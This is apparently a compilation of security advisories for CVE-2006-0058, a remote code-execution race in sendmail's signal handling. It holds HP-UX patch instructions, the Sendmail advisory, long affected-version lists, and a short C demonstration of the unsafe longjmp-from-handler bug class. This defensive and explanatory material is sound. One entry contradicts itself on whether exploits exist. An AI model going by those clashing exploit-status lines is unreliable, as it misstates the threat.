modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.

For sendmail 8.8.6
HP-UX B.11.00
==========
InternetSrvcs.INETSVCS-RUN
 ->action: remove UNOF_INET_29773_3.depot if installed,
install PHNE_32006 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.


END AFFECTED VERSIONS

RESOLUTION

HP has made the following software updates and patches available
to resolve the issue.

The patches are available from http://itrc.hp.com

The software updates can be downloaded via ftp from:

System: hprc.external.hp.com (192.170.19.100)
Login: sendmail
Password: sendmail (NOTE: CASE-sensitive)

ftp://sendmail:sendmail@hprc.external.hp.com
or
ftp://sendmail:sendmail@192.170.19.100

The cksum and md5 output for the preliminary depots are listed below.
The cksum and md5 output are also found in the README.txt.pgp on the ftp site.

For sendmail 8.13.3, HP-UX B.11.23

sendmail-8.13_1123.depot
cksum 692720776 15759360
md5 E09933A4AECC16B97A8F7ACF07060F84
sendmail -bs banner:
Sendmail version 8.13.3 - Revision 2.002_Beta - 2006/03/25
what(1) string:
Sendmail version 8.13.3 - Revision 2.002_Beta - 2006/03/25

For sendmail 8.13.3, HP-UX B.11.11

sendmail-8.13_1111.depot
cksum 954959898 5130240
md5 C85EFD8AEDB16EEF1DF0FF65988350C0
sendmail -bs banner:
Sendmail version 8.13.3 - Revision 2.002_Beta - 2006/03/25
what(1) string:
Sendmail version 8.13.3 - Revision 2.002_Beta - 2006/03/25

For sendmail 8.11.1, HP-UX B.11.23

 ->Note: If UNOF_INET31734_1.depot or UNOF_INET31734_3.depot has
 ->been installed, it must be removed using swremove(1M) before
 ->installing UNOF_INET31734_4.depot.

 ->UNOF_INET31734_4.depot
 ->cksum 2157915677 3317760
 ->md5 10e6bf81c4a5ca75e77ae942c57b2641
 ->sendmail -bs banner:
 ->Sendmail 8.11.1 (UNOF_INET31734_4)
 ->what(1) string:
 ->version.c 8.11.1 (Berkeley) - 2006/05/16 (UNOF_INET31734_4)

For sendmail 8.11.1, HP-UX B.11.11

 ->sendmail-811_09.depot
 ->cksum 1490250822 2938880
 ->md5 c1dbd4784e91282e6a08a88944ffe22b
 ->sendmail -bs banner:
 ->Sendmail 8.11.1 (Revision 1.9)
 ->what(1) string:
 ->version.c 8.11.1 (Berkeley) - (Revision 1.9) - 2006/05/16

For sendmail 8.11.1, HP-UX B.11.00

 ->sendmail-811_01.008.depot
 ->cksum 2401149843 2897920
 ->md5 7e449621f81646fac1b5abd67c2a5b4b
 ->sendmail -bs banner:
 ->Sendmail 8.11.1 - (Revision 1.8)
 ->what(1) string:
 ->version.c 8.11.1 (Berkeley) - (Revision 1.8) - 2006/05/02

For sendmail 8.9.3, HP-UX B.11.11
 ->If UNOF_INET_29774_3.depot is installed, remove it using swremove(1M).
 ->Then install:
 ->PHNE_31917 or subsequent

For sendmail 8.9.3, HP-UX B.11.00
 ->If UNOF_INET_29772_3.depot is installed, remove it using swremove(1M).
 ->Then install:
 ->PHNE_32006 or subsequent

For sendmail 8.8.6, HP-UX B.11.00
 ->If UNOF_INET_29772_3.depot is installed, remove it using swremove(1M).
 ->Then install:
 ->PHNE_32006 or subsequent
 ->Note : PHNE_32006 or subsequent upgrades sendmail 8.8.6 to sendmail 8.9.3.



For all versions of sendmail:
modify sendmail.cf to add 'restrictqrun' to the PrivacyOptions.


After installation, verify output of what /usr/sbin/sendmail.
To check if installations are running sendmail 8.8.6 execute
"what /usr/sbin/sendmail" and check the version string.

MANUAL ACTIONS: Yes - NonUpdate
HP-UX B.11.00 - install preliminary software updates from ftp server
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions
HP-UX B.11.11 - install preliminary software updates from ftp server
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions
HP-UX B.11.23 - install preliminary software updates from ftp server
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions


PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00
analyzes all HP-issued Security Bulletins to provide a subset of
recommended actions that potentially affect a specific HP-UX
system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

HISTORY:
Version: 1 (rev.1) - 25 March 2006 Initial release
Version: 2 (rev.2) - 30 March 2006 updated md5 / cksum output
Version: 3 (rev.3) - 04 April 2006 updated B.11.23 depot,
added 8.11.1 for B.11.23 depot
Version: 4 (rev.4) - 07 April 2006 added 8.9.3 depot for B.11.11
Version: 5 (rev.5) - 10 April 2006 clarified affected versions
Version: 6 (rev.6) - 12 April 2006 added 8.9.3 and 8.11.1 depots for B.11.00
Version: 7 (rev.7) - 18 April 2006 added 8.11.1 upgrade for HP-UX B.11.11
Version: 8 (rev.8) - 24 April 2006 replaced 8.9.3 depot for HP-UX B.11.00
and B.11.11
Version: 9 (rev.9) - 25 April 2006 added manual actions
Version: 10 (rev.10) - 03 May 2006 replaced 8.9.3 depot for HP-UX B.11.00
and B.11.11, added 8.11.1 depot for B.11.00
Version: 11 (rev.11) - 18 May 2006 sendmail 8.11.1 replacements
UNOF_INET31734_4, sendmail-811_01.008.depot, and sendmail-811_09.depot,
sendmail 8.9.3 new PHNE_31917, sendmail 8.8.6, sendmail 8.9.3 new PHNE_32006


Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: security-alert@hp.com.  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: security-alert@hp.com
  Subject: get key

(c)Copyright 2006 Hewlett-Packard Development Company, L.P.

- Vulnerability information (F44950)

sendmail0058.txt (PacketStormID:F44950)
2006-03-28 00:00:00

advisory,remote,arbitrary
linux,unix
CVE-2006-0058

Sendmail, Inc. has recently become aware of a security vulnerability in certain versions of sendmail Mail Transfer Agent (MTA) and UNIX and Linux products that contain it. Sendmail was notified by security researchers at ISS that, under some specific timing conditions, this vulnerability may permit a specifically crafted attack to take over the sendmail MTA process, allowing remote attackers to execute commands and run arbitrary programs on the system running the MTA, affecting email delivery, or tampering with other programs and data on this system. Versions 8.13.5 and below are affected.

the official advisory from http://www.sendmail.com/company/advisory/
===
Sendmail MTA Security Vulnerability

March 22, 2006

I. Overview

Sendmail, Inc. has recently become aware of a security vulnerability in 
certain versions of sendmail Mail Transfer Agent (MTA) and UNIX and Linux 
products that contain it.  Sendmail was notified by security researchers at 
ISS that, under some specific timing conditions, this vulnerability may 
permit a specifically crafted attack to take over the sendmail MTA process, 
allowing remote attackers to execute commands and run arbitrary programs on 
the system running the MTA, affecting email delivery, or tampering with 
other programs and data on this system.  This vulnerability is being 
tracked as CVE-2006-0058 and can be found at 
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0058.

Sendmail is not aware of any public exploit code for this 
vulnerability.  This connection-oriented vulnerability does not occur in 
the normal course of sending and receiving email.  It is only triggered 
when specific conditions are created through SMTP connection layer commands.

Sendmail has confirmed the technical issue exposing this vulnerability and 
is providing patches that resolve it in our open source and commercial 
products.  Sendmail has also alerted CERT    

- Vulnerability information

24037
Sendmail Signal Handler Race Condition Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

Sendmail contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the sm_syslog() function, which allows an attacker to pass crafted data to the setjmp(3) and longjmp(3) functions, causing memory corruption. This can be used to remotely execute arbitrary code without authentication.
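
The bug class described above, shown in miniature as an added example (not Sendmail's code and not taken from any advisory): a timeout handler that leaves interrupted code with siglongjmp() abandons a two-step update of static state half done, while a handler that only sets a sig_atomic_t flag lets the update finish. The `logbuf` structure, the `append()` routine and the `raise()` call that fixes the timing are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for static state kept by a non-reentrant routine.
 * Invariant: len == strlen(data). External linkage, so the compiler must
 * commit every store before calling into other code. */
struct log_state { size_t len; char data[64]; } logbuf;

static sigjmp_buf timeout_env;
static volatile sig_atomic_t timed_out;
static volatile sig_atomic_t jump_from_handler;

static void on_alarm(int sig)
{
    (void)sig;
    if (jump_from_handler)
        siglongjmp(timeout_env, 1); /* unsafe: abandons the interrupted code */
    timed_out = 1;                  /* safe: record the event, nothing else */
}

/* Two-step update of the static state. raise() stands in for a timeout
 * signal that happens to arrive between the two steps. */
static void append(const char *s)
{
    size_t n = strlen(s);
    logbuf.len += n;                                /* invariant broken */
    raise(SIGALRM);                                 /* constructed timing */
    memcpy(logbuf.data + logbuf.len - n, s, n + 1); /* invariant restored */
}

/* Runs one timed operation; returns 1 if the invariant still holds. */
int invariant_holds_after_timeout(int use_longjmp)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_alarm;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGALRM, &sa, NULL);

    memset(&logbuf, 0, sizeof logbuf);
    timed_out = 0;
    jump_from_handler = use_longjmp;

    if (sigsetjmp(timeout_env, 1) == 0)
        append("MAIL FROM");
    /* Flag variant: the timeout is acted on here, at a safe point, after
     * append() has finished. Jump variant: control arrives here mid-update. */
    return logbuf.len == strlen(logbuf.data);
}

int timeout_was_recorded(void) { return timed_out == 1; }

int main(void)
{
    printf("longjmp from handler: invariant holds = %d\n",
           invariant_holds_after_timeout(1));
    printf("flag set in handler:  invariant holds = %d\n",
           invariant_holds_after_timeout(0));
    return 0;
}
```

In the jump variant the recorded length says nine bytes while the buffer is still empty, which is the kind of inconsistent static state that later code trusts when it computes write offsets.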

- Timeline

2006-03-22 Unknown
2006-03-22 Unknown

- Solution

Upgrade to version 8.13.6 or higher, as it has been reported to fix this vulnerability. In addition, Sendmail has released a patch for some older versions.

- Related references

- Vulnerability author

- Vulnerability information

Sendmail Asynchronous Signal Handling Remote Code Execution Vulnerability
Race Condition Error 17192
Yes No
2006-03-22 12:00:00 2007-09-22 12:00:00
Discovered by Mark Dowd.

- Affected versions

Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Appliance Server Hosting Edition 1.0
Turbolinux Appliance Server 1.0 Workgroup Edition
Turbolinux Appliance Server 1.0 Hosting Edition
Turbolinux Appliance Server 2.0
Trend Micro InterScan VirusWall 8.0
Trend Micro InterScan VirusWall 7.0
SuSE SUSE Linux Enterprise Server 8
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 10.0_x86
Sun Solaris 10
Sun Cobalt RaQ XTR
Sun Cobalt RaQ 550
Sun Cobalt RaQ 4
Slackware Linux 10.2
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
SGI ProPack 3.0 SP6
SGI IRIX 6.5.29
SGI IRIX 6.5.28
SGI IRIX 6.5.27
SGI IRIX 6.5.26
SGI IRIX 6.5.25
SGI IRIX 6.5.24 m
SGI IRIX 6.5.24
SGI IRIX 6.5.23 m
SGI IRIX 6.5.23
SGI IRIX 6.5.22 m
SGI IRIX 6.5.22
SGI IRIX 6.5.21 m
SGI IRIX 6.5.21 f
SGI IRIX 6.5.21
SGI IRIX 6.5.20 m
SGI IRIX 6.5.20 f
SGI IRIX 6.5.20
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.19
Sendmail Consortium Sendmail 8.13.5
Sendmail Consortium Sendmail 8.13.4
Sendmail Consortium Sendmail 8.13.3
Sendmail Consortium Sendmail 8.12.11
Sendmail Consortium Sendmail 8.12.10
Sendmail Consortium Sendmail 8.12.9
Sendmail Consortium Sendmail 8.12.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ Yellow Dog Linux 3.0
Sendmail Consortium Sendmail 8.12.7
Sendmail Consortium Sendmail 8.12.6
Sendmail Consortium Sendmail 8.12.5
Sendmail Consortium Sendmail 8.12.4
Sendmail Consortium Sendmail 8.12.3
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.1
+ HP MPE/iX 7.5
+ HP MPE/iX 7.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Sendmail Consortium Sendmail 8.12 beta7
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12 beta16
Sendmail Consortium Sendmail 8.12 beta12
Sendmail Consortium Sendmail 8.12 beta10
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.11.7
Sendmail Consortium Sendmail 8.11.6
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
Sendmail Consortium Sendmail 8.11.3
Sendmail Consortium Sendmail 8.11.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11
Sendmail Consortium Sendmail 8.10.2
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.9.3
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ IBM AIX 4.3.3
+ SGI IRIX 6.5.19
+ SGI IRIX 6.5.18 m
+ SGI IRIX 6.5.18 f
+ SGI IRIX 6.5.17 m
+ SGI IRIX 6.5.17 f
+ SGI IRIX 6.5.16 m
+ SGI IRIX 6.5.16 f
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.1
Sendmail Consortium Sendmail 8.9 .0
Sendmail Consortium Sendmail 8.8.8
SCO Unixware 7.1.4
SCO Unixware 7.1.3
SCO Open Server 6.0
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Enterprise Server 9
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core5
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
OpenPKG OpenPKG 2.5
OpenPKG OpenPKG 2.4
OpenPKG OpenPKG 2.3
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 2.0
OpenBSD OpenBSD 3.8
OpenBSD OpenBSD 3.7
OpenBSD OpenBSD 3.6
OpenBSD OpenBSD 3.5
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
Nortel Networks W-NMS-UMTS 4.2
Nortel Networks W-NMS-GPRS 4.2
Nortel Networks W-NMS-CNM 1.0
NetBSD NetBSD 2.1
NetBSD NetBSD 2.0.3
NetBSD NetBSD 2.0.2
NetBSD NetBSD 2.0.1
NetBSD NetBSD 2.0
NetBSD NetBSD 1.6.2
NetBSD NetBSD 1.6.1
NetBSD NetBSD 1.6 beta
NetBSD NetBSD 1.6
Navision Financials Server 3.0
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
IBM Hardware Management Console (HMC) 5.2.1
IBM AIX 5.3 L
IBM AIX 5.2 L
IBM AIX 5.1 L
IBM AIX 5.3
IBM AIX 5.2
IBM AIX 5.1
HP Tru64 5.1 B-3
HP Tru64 5.1 B-2 PK4
HP Tru64 5.1 A PK6
HP Tru64 4.0 G PK4
HP Tru64 4.0 F PK8
HP Internet Express 6.5
HP Internet Express 6.4
HP Internet Express 6.3
HP HP-UX 11.23
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX B.11.23
HP HP-UX B.11.11
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
Gentoo Linux
FreeBSD FreeBSD 6.0 -STABLE
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.2.1 -RELEASE
FreeBSD FreeBSD 5.2 -RELENG
FreeBSD FreeBSD 5.2 -RELEASE
FreeBSD FreeBSD 5.2
FreeBSD FreeBSD 5.1 -RELENG
FreeBSD FreeBSD 5.1 -RELEASE/Alpha
FreeBSD FreeBSD 5.1 -RELEASE-p5
FreeBSD FreeBSD 5.1 -RELEASE
FreeBSD FreeBSD 5.1
FreeBSD FreeBSD 5.0 -RELENG
FreeBSD FreeBSD 5.0 -RELEASE-p14
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.11 -STABLE
FreeBSD FreeBSD 4.11 -RELENG
FreeBSD FreeBSD 4.11 -RELEASE-p3
FreeBSD FreeBSD 4.10 -RELENG
FreeBSD FreeBSD 4.10 -RELEASE-p8
FreeBSD FreeBSD 4.10 -RELEASE
FreeBSD FreeBSD 4.10
FreeBSD FreeBSD 4.9 -RELENG
FreeBSD FreeBSD 4.9 -PRERELEASE
FreeBSD FreeBSD 4.9
FreeBSD FreeBSD 4.8 -RELENG
FreeBSD FreeBSD 4.8 -RELEASE-p7
FreeBSD FreeBSD 4.8 -PRERELEASE
FreeBSD FreeBSD 4.8
FreeBSD FreeBSD 4.7 -STABLE
FreeBSD FreeBSD 4.7 -RELENG
FreeBSD FreeBSD 4.7 -RELEASE-p17
FreeBSD FreeBSD 4.7 -RELEASE
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6.2
FreeBSD FreeBSD 4.6 -STABLE
FreeBSD FreeBSD 4.6 -RELENG
FreeBSD FreeBSD 4.6 -RELEASE-p20
FreeBSD FreeBSD 4.6 -RELEASE
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
FreeBSD FreeBSD 4.5 -STABLE
FreeBSD FreeBSD 4.5 -RELENG
FreeBSD FreeBSD 4.5 -RELEASE-p32
FreeBSD FreeBSD 4.5 -RELEASE
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4 -STABLE
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4 -RELEASE-p42
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3 -STABLE
FreeBSD FreeBSD 4.3 -RELENG
FreeBSD FreeBSD 4.3 -RELEASE-p38
FreeBSD FreeBSD 4.3 -RELEASE
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.2 -STABLEpre122300
FreeBSD FreeBSD 4.2 -STABLEpre050201
FreeBSD FreeBSD 4.2 -STABLE
FreeBSD FreeBSD 4.2 -RELEASE
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 4.1.1 -STABLE
FreeBSD FreeBSD 4.1.1 -RELEASE
FreeBSD FreeBSD 4.1.1
FreeBSD FreeBSD 4.1
FreeBSD FreeBSD 4.0 .x
FreeBSD FreeBSD 4.0 -RELENG
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5.1 -STABLEpre2001-07-20
FreeBSD FreeBSD 3.5.1 -STABLE
FreeBSD FreeBSD 3.5.1 -RELEASE
FreeBSD FreeBSD 3.5.1
FreeBSD FreeBSD 3.5 x
FreeBSD FreeBSD 3.5 -STABLEpre122300
FreeBSD FreeBSD 3.5 -STABLEpre050201
FreeBSD FreeBSD 3.5 -STABLE
FreeBSD FreeBSD 3.5
FreeBSD FreeBSD 3.4 x
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3 x
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2 x
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1 x
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0 -RELENG
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.2 x
FreeBSD FreeBSD 2.2
FreeBSD FreeBSD 2.1.7 .1
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1 x
FreeBSD FreeBSD 2.1
FreeBSD FreeBSD 2.0.5
FreeBSD FreeBSD 2.0
FreeBSD FreeBSD 1.1.5 .1
FreeBSD FreeBSD 5.4-STABLE
FreeBSD FreeBSD 4.10-PRERELEASE
FreeBSD FreeBSD 3.x
FreeBSD FreeBSD 2.x
F-Secure Messaging Security Gateway X200 3.1
F-Secure Messaging Security Gateway P800 3.2.4
F-Secure Messaging Security Gateway P600 3.2.4
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Conectiva Linux 10.0
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya Communication Manager Server S8700
Avaya Communication Manager Server S8500
Avaya Communication Manager Server S8300
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Avaya CMS Server 13.1
Sendmail Consortium Sendmail 8.13.6

- Unaffected versions

Sendmail Consortium Sendmail 8.13.6

- Discussion

Sendmail is prone to a remote code-execution vulnerability.

Remote attackers may leverage this issue to execute arbitrary code with the privileges of the application, which typically runs as superuser.

Versions prior to Sendmail 8.13.6 are vulnerable to this issue.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com

Proof-of-concept exploits are available.

- Solution

The vendor has released version 8.13.6 to address this issue.

Please see the referenced advisories for more information and fixes.


OpenBSD OpenBSD 3.0
IBM AIX 5.1
HP HP-UX B.11.11
OpenBSD OpenBSD 3.1
HP HP-UX B.11.00
OpenBSD OpenBSD 3.5
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.5
FreeBSD FreeBSD 4.8 -PRERELEASE
FreeBSD FreeBSD 4.8
SCO Unixware 7.1.4
Sendmail Consortium Sendmail 8.11.2
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12.1
Sendmail Consortium Sendmail 8.12.11
Sendmail Consortium Sendmail 8.12.8
Sendmail Consortium Sendmail 8.13.5
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.3

- Related references
